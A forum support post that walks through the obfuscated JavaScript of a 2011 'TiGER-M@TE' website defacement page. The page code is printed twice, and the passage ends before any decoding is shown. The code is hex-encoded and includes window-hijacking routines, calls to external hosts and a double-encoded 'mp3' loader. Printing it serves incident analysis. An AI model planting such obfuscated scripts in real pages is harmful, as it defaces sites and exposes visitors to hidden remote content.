What does the TiGER-M@TE hack file actually do?

Support Documentation in response to the September 25, 2011 TiGER-M@TE hack

Moderator: Ilbin


Post by bradm on Thu Sep 29, 2011 2:34 pm

We've received several updates from users stating that they believe the TiGER-M@TE defacement script attempted to install a virus on their local machine. In this post we'll walk through the code and see what is actually happening.

The following pages were used to decode the text in the script:
http://home2.paulschou.net/tools/xlate/
http://www.silisoftware.com/tools/entitydecode.php

Starting off, here's the actual code:
Code:
<html><head>
<title>HackeD By TiGER-M@TE</title></head>
<style>
body { scrollbar-track-color: #000000;scrollbar-darkshadow-color: #000000; scrollbar-face-color: #000000; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #000000;  scrollbar-arrow-color: #FFFFFF; color:#8E959E }
.name { text-decoration: none;}
</style><script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} 
;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;</script><body bgcolor="#000000" oncontextmenu="return false;"><p align="center"><span style="font-weight: 700;"><font face="Tahoma" size="5" color="#EEEEEE"><i>Server HackeD<br/><br/>By</i> </font><br/><br/><a href="#" class="name"><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script><i onclick="details()">TiGER-M@TE</i></font></a></span><br/><br/><script>var l1n3='<img src="data:image/gif;base64,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" />';
document.write(l1n3+l1n3);</script></br/><br/><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script>#Bangladeshi HackeR</font><br/><br/><br/>
<script>var _0x9355=["\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65"];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]);</script>
<br/><br/><br/><font face="Lucida Console" size="5" color="#FFFFFF" weight="bold">Greetz :</font> <font color="#FF0000" size="4"><b>aBu.HaLiL501</b></font> ; <font color="#FF0000" size="4"><b>w7sh.syria</b></font> ; <font color="#FF0000" size="4"><b>Sy-Hacker</b></font> ; <font color="#FF0000" size="4"><b>NmR.Hacker</b></font> ; <font color="#FF0000" size="4"><b>Wa7sh Hacker</b></font> ; <font color="#FF0000" size="4"><b>h311 c0d3</b></font></p><p style="border: solid 10px #242424; padding: 15px; text-align:center; -moz-border-radius: 15px; -khtml-border-radius: 15px; -webkit-border-radius: 15px; border-radius: 15px; margin: 0;"><span style="font-weight: 700;"><font face="Tahoma" size="1" color="#FF0000"><i><font color="white" weight"bold">#</font>TiGER-M@TE<br/>#<font color="white" weight="bold">localhost_80@hotmail.com</font><br/><font color="white" weight"bold"></font><font color="yellow">&#169;UNDERGROUND HACKERS  2007 - 2011 </font></i><br/><br/><font size="3">#EOF</font></font></span></p></body>

<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">var _0xd8af=["\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35
\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45","\x77\x72\x69\x74\x65","\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x
43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x39\x6F\x72\x72\x73\x76\x25\x32\x38\x36\x47\x34\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x77\x25\x37\x43\x73\x68\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x64\x73\x73\x6F\x6C\x66\x64\x77\x6C\x72\x71\x32\x25\x37\x42\x30\x76\x6B\x72\x66\x6E\x7A\x64\x79\x68\x30\x69\x6F\x64\x76\x6B\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x68\x70\x65\x68\x67\x25\x32\x38\x36\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x36\x46\x32\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x33"];document[_0xd8af[1]](unescape(_0xd8af[0]));dF(_0xd8af[2]);</script>

<!-- mp3 code ended -->

</html>

The first thing we'll do is strip out any standard html code, which leaves us with this:

Code:
<script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} 
;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;</script><body bgcolor="#000000" oncontextmenu="return false;"><p align="center"><span style="font-weight: 700;"><font face="Tahoma" size="5" color="#EEEEEE"><i>Server HackeD<br/><br/>By</i> </font><br/><br/><a href="#" class="name"><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script><script>var l1n3='<img src="data:image/gif;base64,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" />';
document.write(l1n3+l1n3);</script></br/><br/><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script>
<script>var _0x9355=["\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x6F\x74\x6F\x6E\x6F\x6E\x73\x2E\x72\x75\x2F\x69\x6D\x61\x67\x65\x73\x2F\x31\x37\x2E\x30\x33\x2E\x31\x31\x2F\x62\x79\x74\x69\x67\x65\x72\x6D\x74\x65\x2E\x6A\x70\x67\x22\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x74\x68\x69\x73\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x6E\x75\x6C\x6C\x3B\x74\x68\x69\x73\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x61\x67\x65\x2E\x62\x61\x79\x69\x6D\x67\x2E\x63\x6F\x6D\x2F\x6D\x61\x65\x61\x64\x61\x61\x64\x69\x2E\x6A\x70\x67\x27\x3B\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65"];if(document[_0x9355[0]]!=_0x9355[1]){exit(0);} ;document[_0x9355[3]](_0x9355[2]);</script>

<!-- mp3 code starts from here,feel free to copy/paste -->

<script language="javascript">var _0xd8af=["\x25\x33\x43\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x36\x43\x25\x36\x31\x25\x36\x45\x25\x36\x37\x25\x37\x35\x25\x36\x31\x25\x36\x37\x25\x36\x35\x25\x33\x44\x25\x32\x32\x25\x36\x41\x25\x36\x31\x25\x37\x36\x25\x36\x31\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x32\x25\x33\x45\x25\x36\x36\x25\x37\x35\x25\x36\x45\x25\x36\x33\x25\x37\x34\x25\x36\x39\x25\x36\x46\x25\x36\x45\x25\x32\x30\x25\x36\x34\x25\x34\x36\x25\x32\x38\x25\x37\x33\x25\x32\x39\x25\x37\x42\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x33\x25\x33\x31\x25\x33\x44\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x33\x30\x25\x32\x43\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x32\x30\x25\x37\x36\x25\x36\x31\x25\x37\x32\x25\x32\x30\x25\x37\x34\x25\x33\x44\x25\x32\x37\x25\x32\x37\x25\x33\x42\x25\x36\x36\x25\x36\x46\x25\x37\x32\x25\x32\x38\x25\x36\x39\x25\x33\x44\x25\x33\x30\x25\x33\x42\x25\x36\x39\x25\x33\x43\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x33\x42\x25\x36\x39\x25\x32\x42\x25\x32\x42\x25\x32\x39\x25\x37\x34\x25\x32\x42\x25\x33\x44\x25\x35\x33\x25\x37\x34\x25\x37\x32\x25\x36\x39\x25\x36\x45\x25\x36\x37\x25\x32\x45\x25\x36\x36\x25\x37\x32\x25\x36\x46\x25\x36\x44\x25\x34\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x32\x38\x25\x37\x33\x25\x33\x31\x25\x32\x45\x25\x36\x33\x25\x36\x38\x25\x36\x31\x25\x37\x32\x25\x34\x33\x25\x36\x46\x25\x36\x34\x25\x36\x35\x25\x34\x31\x25\x37\x34\x25\x32\x38\x25\x36\x39\x25\x32\x39\x25\x32\x44\x25\x37\x33\x25\x32\x45\x25\x37\x33\x25\x37\x35
\x25\x36\x32\x25\x37\x33\x25\x37\x34\x25\x37\x32\x25\x32\x38\x25\x37\x33\x25\x32\x45\x25\x36\x43\x25\x36\x35\x25\x36\x45\x25\x36\x37\x25\x37\x34\x25\x36\x38\x25\x32\x44\x25\x33\x31\x25\x32\x43\x25\x33\x31\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x36\x34\x25\x36\x46\x25\x36\x33\x25\x37\x35\x25\x36\x44\x25\x36\x35\x25\x36\x45\x25\x37\x34\x25\x32\x45\x25\x37\x37\x25\x37\x32\x25\x36\x39\x25\x37\x34\x25\x36\x35\x25\x32\x38\x25\x37\x35\x25\x36\x45\x25\x36\x35\x25\x37\x33\x25\x36\x33\x25\x36\x31\x25\x37\x30\x25\x36\x35\x25\x32\x38\x25\x37\x34\x25\x32\x39\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x33\x43\x25\x32\x46\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x45","\x77\x72\x69\x74\x65","\x25\x32\x38\x36\x46\x76\x66\x75\x6C\x73\x77\x25\x32\x38\x36\x48\x6C\x69\x25\x32\x38\x35\x25\x33\x42\x67\x72\x66\x78\x70\x68\x71\x77\x31\x77\x6C\x77\x6F\x68\x25\x32\x38\x35\x34\x25\x32\x38\x36\x47\x25\x32\x38\x35\x25\x33\x41\x4B\x64\x66\x6E\x68\x47\x25\x32\x38\x35\x33\x45\x25\x37\x43\x25\x32\x38\x35\x33\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x25\x33\x41\x45\x68\x25\x37\x42\x6C\x77\x25\x32\x38\x35\x25\x33\x42\x33\x25\x32\x38\x35\x25\x33\x43\x25\x32\x38\x36\x45\x25\x32\x38\x25\x33\x41\x47\x25\x32\x38\x33\x44\x67\x72\x66\x78\x70\x68\x71\x77\x31\x7A\x75\x6C\x77\x68\x25\x32\x38\x35\x25\x33\x42\x25\x32\x38\x35\x25\x33\x41\x25\x32\x38\x36\x46\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x35\x33\x69\x75\x64\x70\x68\x65\x72\x75\x67\x68\x75\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x6B\x68\x6C\x6A\x6B\x77\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x7A\x6C\x67\x77\x6B\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x33\x25\x32\x38\x35\x35\x25\x32\x38\x35\x33\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x
43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x37\x33\x37\x31\x73\x6B\x73\x25\x32\x38\x35\x35\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x32\x6C\x69\x75\x64\x70\x68\x25\x32\x38\x36\x48\x25\x32\x38\x36\x46\x68\x70\x65\x68\x67\x25\x32\x38\x35\x33\x76\x75\x66\x25\x32\x38\x36\x47\x25\x32\x38\x35\x35\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x45\x25\x37\x43\x62\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x36\x49\x76\x72\x78\x71\x67\x76\x7A\x69\x25\x32\x38\x36\x47\x6B\x77\x77\x73\x25\x32\x38\x36\x44\x32\x32\x25\x33\x41\x25\x33\x41\x31\x35\x37\x25\x33\x41\x31\x39\x25\x33\x43\x31\x39\x25\x33\x42\x32\x31\x31\x31\x32\x57\x6C\x4A\x48\x55\x30\x50\x43\x57\x48\x31\x76\x7A\x69\x25\x32\x38\x35\x39\x64\x78\x77\x72\x73\x6F\x64\x25\x37\x43\x